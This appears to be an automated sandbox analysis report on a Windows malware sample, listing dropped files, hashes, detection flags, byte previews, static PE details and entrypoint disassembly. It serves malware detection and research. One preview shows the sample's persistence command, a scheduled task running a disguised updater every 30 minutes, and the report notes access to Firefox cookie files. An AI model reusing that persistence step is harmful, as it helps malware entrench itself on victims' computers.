                                                                                                                                                                                                                                                                                                                                                                SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\setting.ini (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):442
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8280681998470794
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
                                                                                                                                                                                                                                                                                                                                                                MD5:09204E71E9F3B624E909FB20DEFE6EF5
                                                                                                                                                                                                                                                                                                                                                                SHA1:2374900EBB8D9BB7127217DAE828A949B8E7938B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
                                                                                                                                                                                                                                                                                                                                                                SHA-512:7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):129038
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.508174898498455
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
                                                                                                                                                                                                                                                                                                                                                                MD5:3D8C24A40935FB27FC494FC6147E6EA8
                                                                                                                                                                                                                                                                                                                                                                SHA1:C26B6949C34AADB8271E124CE08F511BE5033A04
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.f................................................................@... ...................... .......0..T....`.......................p..x...................................................X1...............................text...$d.......f..................`.P`.data...P............j..............@.P..rdata..PE.......F...l..............@.`@/4.......'.......(..................@.0@.bss..................................0..edata....... ......................@.0@.idata..T....0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..rsrc........`......................@.0..reloc..x....p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\unins000.dat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:InnoSetup Log VB Smart Card Viewer, version 0x30, 5570 bytes, 138727\user, "C:\Users\user\AppData\Local\VB Smart Card Viewer"
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5570
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.845283852339951
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:rEW4RjpmRJ97u+eOIhl6D7ICSss/Lnw04S:rEW4ZpmpHHIhYICSsAnw0N
                                                                                                                                                                                                                                                                                                                                                                MD5:266C64EA402368DEF71AA1A4E57DF5A1
                                                                                                                                                                                                                                                                                                                                                                SHA1:4A23879359110E83EAB039426DFED2AC535F6C3C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:849A0746E8A74738C3F859C0E6250575FAA4D249283E827B1CC41B0FE347EA72
                                                                                                                                                                                                                                                                                                                                                                SHA-512:42F7E30E8F3BEF2C127072B62B3FC859BE1BC67FB7E3573BFBC9A682C854A3E5FCA2E11A9C0753E91BD72271504E301A7E95E2A5468C66A0AC2CD4A0F7253E95
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:Inno Setup Uninstall Log (b)....................................VB Smart Card Viewer............................................................................................................VB Smart Card Viewer............................................................................................................0...........%...............................................................................................................3...........2.......W....138727.user4C:\Users\user\AppData\Local\VB Smart Card Viewer............. .... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\unins000.exe (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):720373
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.507181359300328
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjUR6FDExyFg:nu7eEYCP8trP837szHUA60SLtcV3E9fE
                                                                                                                                                                                                                                                                                                                                                                MD5:BBC68F2D9923F1E10C37703479C13301
                                                                                                                                                                                                                                                                                                                                                                SHA1:C017AF29745A24F7F74A535407C680A90B1AE5EC
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F62D22F6611EED484B8363209949370E93D07DB172556E8AB853470D691F202A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:B6F534CD0BB6A5DC4DAEB21BF9BC219A7200AA25CBDF87F183571744EE24B4D2AE74911E7996B646934E99BF263C7459BAF8937B1E179441995D59B8B7D96189
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3047424
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.876980552165079
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:ubxuBXjA7pOxwz1HCBCvWV3BE1G89lHdXCkdC7EVUgKcAWg5t:exeYka7WVBEk89lHdXCkdQEdA
                                                                                                                                                                                                                                                                                                                                                                MD5:29DEB5EE2C07F1E8660E10AB6E4A0966
                                                                                                                                                                                                                                                                                                                                                                SHA1:CE8D68341F3A150E0AE4F26BCE649E505F766A5D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EC88B7D9AAB10E45DC4AC1AAFFA5D9DA9BF2E368580BDDF16F0DDE301E97B43F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4D3E6117EA337CA5902CC4E19C99C82A177AB889412E58BFF59B88B348D5589EA3AA10E48878C14DF80276C79FF43D6A15D893E1C53C9888FDD7BDD746D3435B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..>=.um=.um=.umR.~m<.um..{m).umR..mw.um=.tm6.um_.fm(.um..~m<.um..sm<.umRich=.um................PE..L....f.e.............................A............@..................................................................................0 ..i..............................................................................<............................text...:...........................`....rdata..\".......0..................@..@.data...XT.......@..................@....rsrc....p...0 ..p.... .............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):127192
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.479927027421408
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
                                                                                                                                                                                                                                                                                                                                                                MD5:8B2A6E8419A8A4E7D3FD023D97455FB9
                                                                                                                                                                                                                                                                                                                                                                SHA1:2547A1F94FB4F83B7C133A3E285EE11FAA155E84
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
                                                                                                                                                                                                                                                                                                                                                                SHA-512:44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........=......#...#.>...................P.....c.........................`......;.....@... .............................. ...............................P......................................................0!...............................text...d=.......>..................`.P`.data...L....P.......B..............@.0..rdata.. S...`...T...D..............@.`@/4.......2.......4..................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Temp\Task.bat

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):131
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797757447689461
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuN+E2J5xAIEyrKBySKFS3:Ogas7SXEFAuN723faKS3
                                                                                                                                                                                                                                                                                                                                                                MD5:467322334BC9A78A5E8C16164C4CFA5E
                                                                                                                                                                                                                                                                                                                                                                SHA1:F8EA2C7B5BB81F45C1A4AB4CBA90A29FC60868E6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5061C3009CC21C72B82EDA2440994EFC0C972F387244E5A4CC0A6DDFA0F8EECA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:441F536C169F90BBB8185366DA91837B892D06BBA1E413956D3D1507E12BA4D9E34A616D2920B3619A7811D1D7AC065A114280A72AFF5D0F3B180CAEA7E64C3F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\rghwvve

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):306176
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.555852720200777
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:cwwL+ceqk8AFIYODCl9diUGQHzu3jmtRYEM+:rwqcG8U9O49drgjG
                                                                                                                                                                                                                                                                                                                                                                MD5:9DF4007D210772FC229EEFEA7F15C06D
                                                                                                                                                                                                                                                                                                                                                                SHA1:021AE6BCE912D6A3FE9435A307EAC6B85EB18865
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1A04A01FF9144CEE276994C8A5BEDA3EBACBC4846AFB13B8A700212C1092EF14
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CDB941ACD5E97DEDF8C35B2EA78375B8235AB56CB37297648A66AE2A82AA8919F7ECE185A2E244D0AF396CDEF2C66EC19F5CB29D0C56F597FAD46B6B9AC277BD
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...$..c.................T...D.......!.......p....@.............................................................................P.......x............................q..............................h...@............p...............................text....S.......T.................. ..`.rdata...[...p...\...X..............@..@.data...d%.......R..................@....rsrc...x...........................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\rghwvve:Zone.Identifier

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.555852720200777
                                                                                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                                                                                                                                                                • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                                                                                                                                                File name:S23UhdW5DH.exe
                                                                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5:9df4007d210772fc229eefea7f15c06d
                                                                                                                                                                                                                                                                                                                                                                SHA1:021ae6bce912d6a3fe9435a307eac6b85eb18865
                                                                                                                                                                                                                                                                                                                                                                SHA256:1a04a01ff9144cee276994c8a5beda3ebacbc4846afb13b8a700212c1092ef14
                                                                                                                                                                                                                                                                                                                                                                SHA512:cdb941acd5e97dedf8c35b2ea78375b8235ab56cb37297648a66ae2a82aa8919f7ece185a2e244d0af396cdef2c66ec19f5cb29d0c56f597fad46b6b9ac277bd
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:cwwL+ceqk8AFIYODCl9diUGQHzu3jmtRYEM+:rwqcG8U9O49drgjG
                                                                                                                                                                                                                                                                                                                                                                TLSH:59546C4396D1BD50DD268A73CD2EC6E8BA2EF560DE59777A2218AF1F04B0071D173B21
                                                                                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...$..c...

                                                                                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                                                                                Icon Hash:71514121434a4043

                                                                                                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                                                Entrypoint:0x40217f
                                                                                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                Time Stamp:0x631FA924 [Mon Sep 12 21:48:20 2022 UTC]
                                                                                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                Import Hash:6ccd4bc2d35613d37d4776250d7c29da

                                                                                                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26BF8Dh
                                                                                                                                                                                                                                                                                                                                                                jmp 00007F45CD267E8Eh
                                                                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                                                                                push ecx
                                                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26CC1Dh
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp+0Ch], eax
                                                                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esi+0Ch]
                                                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                                                test al, 82h
                                                                                                                                                                                                                                                                                                                                                                jne 00007F45CD268029h
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD268FBDh
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [eax], 00000009h
                                                                                                                                                                                                                                                                                                                                                                or dword ptr [esi+0Ch], 20h
                                                                                                                                                                                                                                                                                                                                                                or eax, FFFFFFFFh
                                                                                                                                                                                                                                                                                                                                                                jmp 00007F45CD268144h
                                                                                                                                                                                                                                                                                                                                                                test al, 40h
                                                                                                                                                                                                                                                                                                                                                                je 00007F45CD26801Fh
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD268FA2h
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [eax], 00000022h
                                                                                                                                                                                                                                                                                                                                                                jmp 00007F45CD267FF5h
                                                                                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                                                                                                                                                                                                                test al, 01h
                                                                                                                                                                                                                                                                                                                                                                je 00007F45CD268028h
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi+04h], ebx
                                                                                                                                                                                                                                                                                                                                                                test al, 10h
                                                                                                                                                                                                                                                                                                                                                                je 00007F45CD26809Dh
                                                                                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [esi+08h]
                                                                                                                                                                                                                                                                                                                                                                and eax, FFFFFFFEh
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi], ecx
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi+0Ch], eax
                                                                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esi+0Ch]
                                                                                                                                                                                                                                                                                                                                                                and eax, FFFFFFEFh
                                                                                                                                                                                                                                                                                                                                                                or eax, 02h
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi+0Ch], eax
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi+04h], ebx
                                                                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                                                                                                                                                test eax, 0000010Ch
                                                                                                                                                                                                                                                                                                                                                                jne 00007F45CD26803Eh
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26C9FAh
                                                                                                                                                                                                                                                                                                                                                                add eax, 20h
                                                                                                                                                                                                                                                                                                                                                                cmp esi, eax
                                                                                                                                                                                                                                                                                                                                                                je 00007F45CD26801Eh
                                                                                                                                                                                                                                                                                                                                                                call 00007F45CD26C9EEh
                                                                                                                                                                                                                                                                                                                                                                add eax, 40h
